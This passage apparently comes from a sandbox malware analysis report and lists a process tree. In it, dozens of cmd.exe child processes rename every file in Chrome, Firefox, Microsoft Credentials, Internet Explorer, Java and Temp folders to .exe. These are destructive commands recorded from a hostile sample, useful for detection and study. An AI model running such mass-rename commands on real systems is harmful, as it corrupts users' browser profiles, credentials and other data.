        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\*.*" "*.exe"
        5⤵
        
        PID:728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*.*" "*.exe"
        5⤵
        
        PID:1976
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*.*" "*.exe"
        5⤵
        
        PID:2032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*.*" "*.exe"
        5⤵
        
        PID:1708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"
        5⤵
        
        PID:860
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"
        5⤵
        
        PID:1152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
        5⤵
        
        PID:796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\*.*" "*.exe"
        5⤵
        
        PID:1720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\*.*" "*.exe"
        5⤵
        
        PID:1628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\*.*" "*.exe"
        5⤵
        
        PID:1332
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\*.*" "*.exe"
        5⤵
        
        PID:1592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:924
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\*.*" "*.exe"
        5⤵
        
        PID:324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\*.*" "*.exe"
        5⤵
        
        PID:548
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\*.*" "*.exe"
        5⤵
        
        PID:1492
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\*.*" "*.exe"
        5⤵
        
        PID:776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\*.*" "*.exe"
        5⤵
        
        PID:1108
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\*.*" "*.exe"
        5⤵
        
        PID:1992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\*.*" "*.exe"
        5⤵
        
        PID:840
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\*.*" "*.exe"
        5⤵
        
        PID:288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
        5⤵
        
        PID:888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"
        5⤵
        
        PID:1252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Credentials\*.*" "*.exe"
        5⤵
        
        PID:1664
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\*.*" "*.exe"
        5⤵
        
        PID:1700
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\*.*" "*.exe"
        5⤵
        
        PID:1820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\*.*" "*.exe"
        5⤵
        
        PID:1628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\*.*" "*.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\*.*" "*.exe"
        5⤵
        
        PID:1524
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\*.*" "*.exe"
        5⤵
        
        PID:1320
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\*.*" "*.exe"
        5⤵
        
        PID:2040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\*.*" "*.exe"
        5⤵
        
        PID:1176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Media\*.*" "*.exe"
        5⤵
        
        PID:856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\*.*" "*.exe"
        5⤵
        
        PID:1144
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\*.*" "*.exe"
        5⤵
        
        PID:2008
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\*.*" "*.exe"
        5⤵
        
        PID:1936
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\*.*" "*.exe"
        5⤵
        
        PID:1156
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72C1GWO9\*.*" "*.exe"
        5⤵
        
        PID:1996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AGWPI80M\*.*" "*.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW6OKHO\*.*" "*.exe"
        5⤵
        
        PID:796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\HN51W9NV\*.*" "*.exe"
        5⤵
        
        PID:1364
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\HPDMG12Q\*.*" "*.exe"
        5⤵
        
        PID:1588
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M7YMRK48\*.*" "*.exe"
        5⤵
        
        PID:1592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\PAHLSM1Y\*.*" "*.exe"
        5⤵
        
        PID:956
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\U0TQR0T7\*.*" "*.exe"
        5⤵
        
        PID:1008
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\*.*" "*.exe"
        5⤵
        
        PID:1196
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\*.*" "*.exe"
        5⤵
        
        PID:1832
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\*.*" "*.exe"
        5⤵
        
        PID:1764
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming\*.*" "*.exe"
        5⤵
        
        PID:1972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\*.*" "*.exe"
        5⤵
        
        PID:1080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\*.*" "*.exe"
        5⤵
        
        PID:1892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\rx62z5k\*.*" "*.exe"
        5⤵
        
        PID:2012
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\*.*" "*.exe"
        5⤵
        
        PID:1224
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\*.*" "*.exe"
        5⤵
        
        PID:1708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\*.*" "*.exe"
        5⤵
        
        PID:288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\*.*" "*.exe"
        5⤵
        
        PID:860
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\*.*" "*.exe"
        5⤵
        
        PID:676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\*.*" "*.exe"
        5⤵
        
        PID:1252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\*.*" "*.exe"
        5⤵
        
        PID:1932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\000076D4\*.*" "*.exe"
        5⤵
        
        PID:1588
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\*.*" "*.exe"
        5⤵
        
        PID:1592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System\*.*" "*.exe"
        5⤵
        
        PID:1824
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User\*.*" "*.exe"
        5⤵
        
        PID:1836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\*.*" "*.exe"
        5⤵
        
        PID:980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\*.*" "*.exe"
        5⤵
        
        PID:2040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\*.*" "*.exe"
        5⤵
        
        PID:1400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\*.*" "*.exe"
        5⤵
        
        PID:744
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\*.*" "*.exe"
        5⤵
        
        PID:1992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\*.*" "*.exe"
        5⤵
        
        PID:2020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" "*.exe"
        5⤵
        
        PID:1608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\*.*" "*.exe"
        5⤵
        
        PID:888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\*.*" "*.exe"
        5⤵
        
        PID:1152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\*.*" "*.exe"
        5⤵
        
        PID:1936
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low\*.*" "*.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\*.*" "*.exe"
        5⤵
        
        PID:1212
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\*.*" "*.exe"
        5⤵
        
        PID:364
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\*.*" "*.exe"
        5⤵
        
        PID:1820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\71VTPOTD\*.*" "*.exe"
        5⤵
        
        PID:1476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GAK7RGXQ\*.*" "*.exe"
        5⤵
        
        PID:1760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7HKSP8D\*.*" "*.exe"
        5⤵
        
        PID:924
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IWNCTIG4\*.*" "*.exe"
        5⤵
        
        PID:1112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KML0NMF1\*.*" "*.exe"
        5⤵
        
        PID:1792
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KV8PQJCO\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SNCNYYOH\*.*" "*.exe"
        5⤵
        
        PID:1004
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z12QDLN4\*.*" "*.exe"
        5⤵
        
        PID:1116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\*.*" "*.exe"
        5⤵
        
        PID:776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\*.*" "*.exe"
        5⤵
        
        PID:1892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\*.*" "*.exe"
        5⤵
        
        PID:304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\*.*" "*.exe"
        5⤵
        
        PID:1608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*.*" "*.exe"
        5⤵
        
        PID:1996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\*.*" "*.exe"
        5⤵
        
        PID:1936
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\*.*" "*.exe"
        5⤵
        
        PID:620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.Admin\*.*" "*.exe"
        5⤵
        
        PID:1364
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\*.*" "*.exe"
        5⤵
        
        PID:1960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\cache2\*.*" "*.exe"
        5⤵
        
        PID:320
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\OfflineCache\*.*" "*.exe"
        5⤵
        
        PID:1560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\safebrowsing\*.*" "*.exe"
        5⤵
        
        PID:1760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\startupCache\*.*" "*.exe"
        5⤵
        
        PID:1800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\thumbnails\*.*" "*.exe"
        5⤵
        
        PID:1492
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\cache2\doomed\*.*" "*.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\cache2\entries\*.*" "*.exe"
        5⤵
        
        PID:1176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\faxxuvis.default-release\safebrowsing\google4\*.*" "*.exe"
        5⤵
        
        PID:856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\1D31.tmp\*.*" "*.exe"
        5⤵
        
        PID:1992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\3029059134\*.*" "*.exe"
        5⤵
        
        PID:2020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin\*.*" "*.exe"
        5⤵
        
        PID:1968
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\Low\*.*" "*.exe"
        5⤵
        
        PID:1748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219\*.*" "*.exe"
        5⤵
        
        PID:288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219\*.*" "*.exe"
        5⤵
        
        PID:1708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files\*.*" "*.exe"
        5⤵
        
        PID:1156
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\WPDNSE\*.*" "*.exe"
        5⤵
        
        PID:1664
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\1D31.tmp\BUG32\*.*" "*.exe"
        5⤵
        
        PID:796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\*.*" "*.exe"
        5⤵
        
        PID:1072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Mozilla\*.*" "*.exe"
        5⤵
        
        PID:1820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\*.*" "*.exe"
        5⤵
        
        PID:1592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\*.*" "*.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\*.*" "*.exe"
        5⤵
        
        PID:1320
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\*.*" "*.exe"
        5⤵
        
        PID:552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\*.*" "*.exe"
        5⤵
        
        PID:1400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\*.*" "*.exe"
        5⤵
        
        PID:880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\*.*" "*.exe"
        5⤵
        
        PID:1116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\*.*" "*.exe"
        5⤵
        
        PID:1080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\*.*" "*.exe"
        5⤵
        
        PID:840
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\*.*" "*.exe"
        5⤵
        
        PID:2012
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security\*.*" "*.exe"
        5⤵
        
        PID:1748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\*.*" "*.exe"
        5⤵
        
        PID:1440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\*.*" "*.exe"
        5⤵
        
        PID:892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\*.*" "*.exe"
        5⤵
        
        PID:620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\*.*" "*.exe"
        5⤵
        
        PID:676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\*.*" "*.exe"
        5⤵
        
        PID:1252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\*.*" "*.exe"
        5⤵
        
        PID:1484
